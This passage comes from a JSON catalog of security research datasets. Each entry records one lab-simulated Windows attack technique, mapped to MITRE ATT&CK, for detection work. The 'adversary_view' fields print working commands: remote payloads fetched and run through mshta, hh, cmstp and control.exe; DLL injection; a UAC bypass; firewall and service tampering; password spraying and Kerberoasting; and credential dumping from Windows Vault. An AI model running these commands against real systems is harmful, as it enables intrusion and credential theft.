C:\\Users\\wardog> Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll\" -OutFile C:\\ProgramData\\T1055.dll\nPS C:\\Users\\wardog> $mypid = (Start-Process notepad -PassThru).id\nPS C:\\Users\\wardog> mavinject $mypid 
/INJECTRUNNING C:\\ProgramData\\T1055.dll"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md#atomic-test-1---process-injection-via-mavinjectexe"]}, "SDWIN-201020013208": {"title": "UI Prompt For Credentials Function", "id": "SDWIN-201020013208", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/20", "modification_date": "2020/10/20", "platform": ["Windows"], "type": "atomic", "tags": ["art.2b162bfd-0928-4d4c-9ec3-4d9f88374b52"], "description": "This dataset represents adversaries leveraging functions such as CredUIPromptForCredentials to create and display a configurable dialog box that accepts credentials information from a user.", "attack_mappings": [{"technique": "T1056", "sub-technique": "002", "tactics": ["TA0006", "TA0009"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_input_capture_promptforcreds.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "powershell", "module": "powershell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password"}], "permissions_required": ["Administrator"], "adversary_view": "PS > $cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)\nPS > write-warning $cred.GetNetworkCredential().Password\nWARNING: testing\nPS >"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa"]}, "SDWIN-201021001911": {"title": "Netsh Open FW Proxy Ports", "id": "SDWIN-201021001911", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": 
"2020/10/21", "modification_date": "2020/10/21", "platform": ["Windows"], "type": "atomic", "tags": ["art.15e57006-79dd-46df-9bf9-31bc24fb5a80"], "description": "This dataset represents adversaries modifying the local FW by opening port for proxy.", "attack_mappings": [{"technique": "T1562", "sub-technique": "004", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_netsh_fw_mod_open_ports.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "cmd", "module": "cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-4---opening-ports-for-proxy---hardrain"}], "permissions_required": ["Administrator"], "adversary_view": "netsh advfirewall firewall add rule name=\"atomic testing\" action=allow dir=in protocol=TCP localport=450\nnetsh advfirewall firewall delete rule name=\"atomic testing\" protocol=TCP localport=450 >nul 2>&1"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-4---opening-ports-for-proxy---hardrain"]}, "SDWIN-201021204544": {"title": "Service Modification Fax", "id": "SDWIN-201021204544", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/21", "modification_date": "2020/10/21", "platform": ["Windows"], "type": "atomic", "tags": ["art.ed366cde-7d12-49df-a833-671904770b9f"], "description": "This dataset represents adversaries modifying a local service to execute powershell.", "attack_mappings": [{"technique": "T1543", "sub-technique": "003", "tactics": ["TA0003", "TA0004"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/privilege_escalation/host/cmd_service_mod_fax.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": 
"Manual", "name": "cmd", "module": "cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md#atomic-test-1---modify-fax-service-to-run-powershell"}], "permissions_required": ["Administrator"], "adversary_view": "sc config Fax binPath= \"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -c \\\"write-host 'T1543.003 Test'\\\"\"\nsc start Fax"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md#atomic-test-1---modify-fax-service-to-run-powershell"]}, "SDWIN-201021232814": {"title": "Internet Explorer Version Discovery", "id": "SDWIN-201021232814", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/21", "modification_date": "2020/10/21", "platform": ["Windows"], "type": "atomic", "tags": ["art.68981660-6670-47ee-a5fa-7e74806420a4"], "description": "This dataset represents threat actors querying HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer to get the version of internet explorer installed on the system.", "attack_mappings": [{"technique": "T1518", "sub-technique": null, "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/cmd_discover_iexplorer_version_registry.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "cmd", "module": "cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md#atomic-test-1---find-and-display-internet-explorer-browser-version"}], "permissions_required": ["Administrator"], "adversary_view": "reg query \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\" /v svcVersion"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md#atomic-test-1---find-and-display-internet-explorer-browser-version"]}, "SDWIN-201022002145": {"title": 
"HH Execution of Local Compiled HTML Payload", "id": "SDWIN-201022002145", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": ["art.5cb87818-0d7c-4469-b7ef-9224107aebe8"], "description": "This dataset represents threat actors executing local compiled HTML Help payloads via hh.exe.", "attack_mappings": [{"technique": "T1218", "sub-technique": "001", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_hh_local_html_payload.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "powershell", "module": "powershell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md#atomic-test-1---compiled-html-help-local-payload"}], "permissions_required": ["Administrator"], "adversary_view": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm\" -OutFile C:\\ProgramData\\T1218.001.chm\nhh.exe C:\\ProgramData\\T1218.001.chm"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md#atomic-test-1---compiled-html-help-local-payload"]}, "SDWIN-201022013121": {"title": "Control Panel Execution", "id": "SDWIN-201022013121", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": ["art.037e9d8a-9e46-4255-8b33-2ae3b545ca6f"], "description": "This dataset represents threat actors leveraging control.exe to execute a .cpl file to proxy execute another payload (i.e. 
calc).", "attack_mappings": [{"technique": "T1218", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_control_panel_execution.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "powershell", "module": "powershell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md#atomic-test-1---control-panel-items"}], "permissions_required": ["Administrator"], "adversary_view": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl\" -OutFile C:\\ProgramData\\calc.cpl\ncontrol.exe C:\\ProgramData\\calc.cpl"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md#atomic-test-1---control-panel-items"]}, "SDWIN-201022015432": {"title": "CMSTP Proxy Execution", "id": "SDWIN-201022015432", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": ["art.748cb4f6-2fb3-4e97-b7ad-b22635a09ab0"], "description": "This dataset represents threat actors leveraging CMSTP to execute an Inf file to proxy execute other malicious commands (i.e. cmd.exe). 
(Embedding commands in the RunPreSetupCommandsSection of the INF file).", "attack_mappings": [{"technique": "T1218", "sub-technique": "003", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_cmstp_execution_bypassuac.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "powershell", "module": "powershell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md#atomic-test-2---cmstp-executing-uac-bypass"}], "permissions_required": ["User"], "adversary_view": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf\" -OutFile C:\\ProgramData\\T1218.003_uacbypass.inf\ncmstp.exe /s C:\\ProgramData\\T1218.003_uacbypass.inf /au"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md#atomic-test-2---cmstp-executing-uac-bypass"]}, "SDWIN-201022022144": {"title": "Mshta Javascript GetObject Sct", "id": "SDWIN-201022022144", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": ["art.1483fab9-4f52-4217-a9ce-daa9d7747cae"], "description": "This dataset represents threat actors leveraging mshta.exe to proxy execute malicious .sct files via Javascript.", "attack_mappings": [{"technique": "T1218", "sub-technique": "005", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_mshta_javascript_getobject_sct.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": 
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-1---mshta-executes-javascript-scheme-fetch-remote-payload-with-getobject"}], "permissions_required": ["Administrator"], "adversary_view": "mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-1---mshta-executes-javascript-scheme-fetch-remote-payload-with-getobject"]}, "SDWIN-201022025808": {"title": "Mshta VBScript Execute PowerShell", "id": "SDWIN-201022025808", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": ["art.906865c3-e05f-4acc-85c4-fbc185455095"], "description": "This dataset represents threat actors leveraging mshta.exe to proxy execute malicious powershell commands via vbscript.", "attack_mappings": [{"technique": "T1218", "sub-technique": "005", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_mshta_vbscript_execute_psh.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-2---mshta-executes-vbscript-to-execute-malicious-command"}], "permissions_required": ["Administrator"], "adversary_view": "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -command Get-Service sysmon\"\":close\")"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-2---mshta-executes-vbscript-to-execute-malicious-command"]}, 
"SDWIN-201022035214": {"title": "Mshta HTML Application (HTA) Execution", "id": "SDWIN-201022035214", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": ["art.c4b97eeb-5249-4455-a607-59f95485cb45"], "description": "This dataset represents threat actors leveraging mshta.exe to proxy execute malicious commands via an .hta file.", "attack_mappings": [{"technique": "T1218", "sub-technique": "005", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_mshta_html_application_execution.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-3---mshta-executes-remote-html-application-hta"}], "permissions_required": ["Administrator"], "adversary_view": "$var =Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta\"\n$var.content|out-file \"$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\"\nmshta \"$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\""}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-3---mshta-executes-remote-html-application-hta"]}, "SDWIN-201022042947": {"title": "PurpleSharp Active Directory Playbook I", "id": "SDWIN-201022042947", "contributors": ["Roberto Rodriguez @Cyb3rWard0g", "Mauricio Velazco @mvelazco"], "creation_date": "2020/10/22", "modification_date": "2020/10/22", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents threat actors performing a few techniques in Active 
Directory to brute force passwords, request Kerberos ticket-granting service (TGS) service tickets from all SPNs, test access to remote network shares, and move laterally over Windows Remote Management (WinRM).", "attack_mappings": [{"technique": "T1110", "sub-technique": "003", "tactics": ["TA0006"]}, {"technique": "T1558", "sub-technique": "003", "tactics": ["TA0006"]}, {"technique": "T1135", "sub-technique": null, "tactics": ["TA0007"]}, {"technique": "T1021", "sub-technique": "006", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/purplesharp_ad_playbook_I.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/purplesharp_ad_playbook_I.zip"}], "simulation": {"environment": "Shire", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/mvelazc0/PurpleSharp"}], "permissions_required": ["Administrator"], "adversary_view": "c:\\Users\\pgustavo\\Downloads>PurpleSharp.exe /t T1110.003,T1558.003,T1135,T1021.006\n10/22/2020 04:29:52 [*] Starting T1110.003 Simulation on WORKSTATION5\n10/22/2020 04:29:52 [*] Simulator running from c:\\Users\\pgustavo\\Downloads\\PurpleSharp.exe with PID:7520 as THESHIRE\\pgustavo\n10/22/2020 04:29:52 [*] Local Domain Brute Force using the LogonUser Win32 API function\n[*] Targeting domain neighbor users\n[*] Using LogonServer MORDORDC.theshire.local for LDAP queries\n[*] Querying for active domain users with badPwdCount <= 3..\n10/22/2020 04:29:53 [*] Obtained 7 user accounts\n10/22/2020 04:29:53 [*] Tried to authenticate as lrodriguez (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*] Tried to authenticate as pgustavo (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*] Tried to authenticate as sysmonsvc (NTLM). 
Error Code:1326\n10/22/2020 04:29:53 [*] Tried to authenticate as sbeavers (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*] Tried to authenticate as mscott (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*] Tried to authenticate as pbeesly (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*] Tried to authenticate as nxlogsvc (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*] Simulation Finished\n10/22/2020 04:29:53 [*] Starting T1558.003 Simulation on WORKSTATION5\n10/22/2020 04:29:53 [*] Simulator running from c:\\Users\\pgustavo\\Downloads\\PurpleSharp.exe with PID:7520 as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN Sysmon/theshire.local (sysmonsvc)\n10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN Nxlog/theshire.local (nxlogsvc)\n10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN Defense/theshire.local (defensesvc)\n10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN OTR/theshire.local (otrsvc)\n10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN Ring/theshire.local (mordorsvc)\n10/22/2020 04:29:54 [*] Simulation Finished\n10/22/2020 04:29:54 [*] Starting T1135 Simulation on WORKSTATION5\n10/22/2020 04:29:54 [*] Simulator running from c:\\Users\\pgustavo\\Downloads\\PurpleSharp.exe with PID:7520 as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*] Using the Win32 API NetShareEnum function to execute this technique\n[*] Obtaining domain neighbor targets ...\n[*] Using MORDORDC.theshire.local for LDAP queries\n10/22/2020 04:29:54 [*] Obtained 4 target computers\n10/22/2020 04:29:54 [*] Successfully enumerated shares on WEC.theshire.local as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*] Successfully enumerated shares on WORKSTATION6.theshire.local as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*] Successfully enumerated shares on MORDORDC.theshire.local as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*] Successfully enumerated shares on WORKSTATION7.theshire.local as 
THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*] Simulation Finished\n10/22/2020 04:29:54 [*] Starting T1021.006 Simulation on WORKSTATION5\n10/22/2020 04:29:54 [*] Simulator running from c:\\Users\\pgustavo\\Downloads\\PurpleSharp.exe with PID:7520 as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*] Using the System.Management.Automation .NET namespace to execute this technique\n10/22/2020 04:29:54 [*] Querying LDAP for random targets...\n[*] Obtaining domain neighbor targets ...\n[*] Using MORDORDC.theshire.local for LDAP queries\n10/22/2020 04:29:54 [*] Obtained 4 target computers\n10/22/2020 04:29:59 [*] Started a process using WinRM on WORKSTATION7\n10/22/2020 04:30:00 [*] Started a process using WinRM on WEC\n10/22/2020 04:30:00 [*] Started a process using WinRM on WORKSTATION6\n10/22/2020 04:30:01 [*] Started a process using WinRM on MORDORDC\n10/22/2020 04:30:01 [*] Simulation Finished\n10/22/2020 04:30:01 [*] Playbook Finished\n\nc:\\Users\\pgustavo\\Downloads>"}, "references": ["https://github.com/mvelazc0/PurpleSharp"]}, "SDWIN-201023020513": {"title": "Register-CimProvider Execute Dll", "id": "SDWIN-201023020513", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/23", "modification_date": "2020/10/23", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents threat actors leveraging Register-Cimprovider to execute a malicious Dll.", "attack_mappings": [{"technique": "T1218", "sub-technique": null, "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_register_cimprovider_execute_dll.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md#atomic-test-3---register-cimprovider---execute-evil-dll"}], 
"permissions_required": ["Administrator"], "adversary_view": "PS >Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll\" -OutFile C:\\ProgramData\\T1218-2.dll\nPS > C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path C:\\ProgramData\\T1218-2.dll\n\n'Namespace' is not specified.\n'ProviderName' is not specified.\nFailed to load provider 'C:\\ProgramData\\T1218-2.dll'. Failure code 0x8007045A.\n\nTry 'Register-CimProvider.exe -help' for help."}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md#atomic-test-3---register-cimprovider---execute-evil-dll"]}, "SDWIN-201023023651": {"title": "Bitsadmin Download Malicious File", "id": "SDWIN-201023023651", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/23", "modification_date": "2020/10/23", "platform": ["Windows"], "type": "atomic", "tags": ["art.3c73d728-75fb-4180-a12f-6712864d7421"], "description": "This dataset represents threat actors leveraging bitsadmin.exe to download a file.", "attack_mappings": [{"technique": "T1197", "sub-technique": null, "tactics": ["TA0003", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_bitsadmin_download_psh_script.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md#atomic-test-1---bitsadmin-download-cmd"}], "permissions_required": ["Administrator"], "adversary_view": "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\\bitsadmin1_flag.ps1\n\nDISPLAY: '/Download' TYPE: DOWNLOAD STATE: TRANSFERRED\nPRIORITY: FOREGROUND FILES: 1 / 1 BYTES: 6886 / 6886 (100%)\nTransfer 
complete."}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md#atomic-test-1---bitsadmin-download-cmd"]}, "SDWIN-201023031210": {"title": "PurpleSharp PE Injection CreateRemoteThread", "id": "SDWIN-201023031210", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/23", "modification_date": "2020/10/23", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents threat actors injecting portable executables (PE) into processes via APIs such asVirtualAllocEx and WriteProcessMemory and running it on the virtual address space of another process via the CreateRemoteThread API.", "attack_mappings": [{"technique": "T1055", "sub-technique": "002", "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/purplesharp_pe_injection_createremotethread.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/mvelazc0/PurpleSharp/blob/master/PurpleSharp/Simulations/DefenseEvasion.cs#L216-L238"}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Users\\wardog\\Desktop>PurpleSharp.exe /t T1055.002\n10/23/2020 03:12:04 [*] Starting T1055.002 Simulation on WORKSTATION5\n10/23/2020 03:12:04 [*] Simulator running from C:\\Users\\wardog\\Desktop\\PurpleSharp.exe with PID:8972 as WORKSTATION5\\wardog\n10/23/2020 03:12:04 [*] Process notepad.exe with PID:9908 started for the injection\n10/23/2020 03:12:04 [*] Calling OpenProcess on PID:9908\n10/23/2020 03:12:04 [*] Calling VirtualAllocEx on PID:9908\n10/23/2020 03:12:04 [*] Calling WriteProcessMemory on PID:9908\n10/23/2020 03:12:04 [*] Calling CreateRemoteThread on PID:9908\n10/23/2020 03:12:04 [*] Simulation Finished\n10/23/2020 03:12:04 [*] Playbook 
Finished\n\nC:\\Users\\wardog\\Desktop>"}, "references": ["https://github.com/mvelazc0/PurpleSharp/blob/master/PurpleSharp/Simulations/DefenseEvasion.cs#L216-L238"]}, "SDWIN-201026235835": {"title": "Process Herpaderping Mimikatz", "id": "SDWIN-201026235835", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/26", "modification_date": "2020/10/26", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents the execution of a Process Herpaderping to obscure the intentions of a process by modifying the content on disk after the image has been mapped.", "attack_mappings": [{"technique": "T1055", "sub-technique": null, "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_process_herpaderping_snippingtool.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/jxy-s/herpaderping"}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Users\\wardog>cd Desktop\n\nC:\\Users\\wardog\\Desktop>ProcessHerpaderping.exe mimikatz.exe wardog.exe C:\\Windows\\system32\\SnippingTool.exe\nProcess Herpaderping Tool - Copyright (c) 2020 Johnny Shaw\n[12140:10252][OK] Source File: \"mimikatz.exe\"\n[12140:10252][OK] Target File: \"wardog.exe\"\n[12140:10252][INFO] Copied source binary to target file\n[12140:10252][INFO] Created image section for target\n[12140:10252][INFO] Created process object, PID 8924\n[12140:10252][INFO] Located target image entry RVA 0x000c3aec\n[12140:10252][OK] Replacing target with \"C:\\Windows\\system32\\SnippingTool.exe\"\n[12140:10252][OK] Preparing target for execution\n[12140:10252][INFO] Writing process parameters, remote PEB ProcessParameters 0x0000000000AED020\n[12140:10252][INFO] Creating thread in process at entry point 
0x00007FF733E63AEC\n[12140:10252][INFO] Created thread, TID 12112\n[12140:10252][OK] Waiting for herpaderped process to exit\n[12140:10252][OK] Herpaderped process exited with code 0xc000013a\n[12140:10252][OK] Process Herpaderp Succeeded\n\nC:\\Users\\wardog\\Desktop>"}, "references": ["https://github.com/jxy-s/herpaderping", "https://twitter.com/jxy__s/status/1320853852153769984"]}, "SDWIN-201028191914": {"title": "Windows Vault Web Credentials", "id": "SDWIN-201028191914", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/28", "modification_date": "2020/10/28", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents threat actors accessing the Windows Vault and reading web credentials saved.", "attack_mappings": [{"technique": "T1055", "sub-technique": null, "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_windows_vault_web_credentials.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": "https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "Add Web Credentials\n-------------------\nPS > $pv = New-Object Windows.Security.Credentials.PasswordVault\nPS > $pw = New-Object Windows.Security.Credentials.PasswordCredential('http://ossemproject.com', 'pgustavo', 'Pass@Word')\nPS >$pv.Add($pw)\n\nImport Get-WebCredentials\n-------------------------\nfunction Get-WebCredentials\n{\n <#\n .SYNOPSIS\n Nishang script to retrieve web credentials from Windows vault (requires PowerShell v3 and above)\n .DESCRIPTION\n This script can be used to retreive web credentiaks stored in Windows Valut from Windows 8 onwards. 
The script \n also needs PowerShell v3 onwards and must be run from an elevated shell.\n .EXAMPLE\n PS > Get-WebCredentials\n .LINK\n https://github.com/samratashok/nishang\n #>\n [CmdletBinding()] Param ()\n \n \n #http://stackoverflow.com/questions/9221245/how-do-i-store-and-retrieve-credentials-from-the-windows-vault-credential-manage\n $ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]\n $VaultObj = new-object Windows.Security.Credentials.PasswordVault\n $VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }\n}\n\nRun Get-WebCredentials\n----------------------\nPS C:\\Users\\wardog> Get-WebCredentials\n\nUserName Resource Password Properties\n-------- -------- -------- ----------\npgustavo http://ossemproject.com Pass@Word {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], ...\n\n\nPS C:\\Users\\wardog>"}, "references": ["https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1"]}, "SDWIN-201029001615": {"title": "Python HTTP Server", "id": "SDWIN-201029001615", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/29", "modification_date": "2020/10/29", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents threat actors adding a FW inbound rule and starting a Python HTTP Server.", "attack_mappings": [{"technique": "T1059", "sub-technique": null, "tactics": ["TA0002"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/execution/host/psh_python_webserver.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "Add Firewall Rule\n-----------------\nPS > & netsh advfirewall firewall add rule name=\"python.exe\" dir=in action=allow 
